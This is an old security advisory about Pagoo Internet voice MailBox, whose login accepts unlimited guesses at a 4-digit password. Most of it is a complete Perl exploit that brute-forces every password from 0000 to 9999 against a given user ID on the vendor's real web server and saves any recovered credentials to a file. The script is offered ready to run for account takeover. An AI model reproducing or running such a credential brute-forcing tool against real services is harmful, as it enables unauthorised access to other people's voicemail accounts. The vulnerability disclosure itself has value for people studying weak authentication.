|
|
|
|
| |
| Pagoo Internet voice MailBox is a product by www.pagoo.com that allows home users to receive phone calls while they are connected to the Internet. The homepage of Pagoo Internet voice MailBox requires any remote user to insert a 4 Digit ID number and 4 Digit Password in order to logon, but this opens the server to attack, enabling anyone with some spare CPU time to brute force the password. |
| |
Credit:
This vulnerability was found by: Elaich Of Hhp
|
| |
The following is a Perl script, that tries all possible 4 Digit passwords:
#!/usr/bin/perl
#
# (hhp) hhp-pagoo.pl (hhp)
# by: elaich of the hhp.
# http://hhp.hemp.net/
# '99'
#
# The (Pagoo Internet voice MailBox) exploit.
# Available at http://www.pagoo.com/
#
# This exploit will extract the password to
# the specified PagooID you specify.
#
# The vulnerability comes into play when you
# connect to your UpdateForm thru signup.asp
# which requires your PagooID and your 4
# digit password.
#
# Nothing will prevent you from reconnecting
# and trying a new password from 0000 in
# increments of 1 till we reach 9999 which
# is the highest password possible... I
# could call this a brute, but it always
# 100% of the time will get the passwd
# unlike a brute.
#
# Logs passwds to file: pagooids
use IO::Socket;
die "usage: $0 <PagooID>\n" unless(@ARGV == 1);
($box) = (@ARGV);
open OUT, ">>pagooids" or die "Can't open temp file -> .pagoo\n";
autoflush OUT 1;
$host = "www.pagoo.com";
autoflush STDOUT 1;
sub parse
{
($num) = @_;
$url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num";
$socket = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 80,
Proto => "tcp") or die "Can't connect.\n";
print $socket "GET $url\n";
print "Trying password: $num of 9999.\n";
while(<$socket>)
{
chomp;
if(/Password invalid/)
{
break;
}
if(/First Name/)
{
print "PagooID password extracted...\n";
print "PagooID: $box / Password: $num\n";
print OUT "PagooID: $box / Password: $num\n";
exit 0;
}
}
}
$num = '0000';
parse $num;
for($i = 0; $i <= 9999; $i++)
{
$num++;
parse $num;
}
|
|
|
|
|
|
|
|
|
|
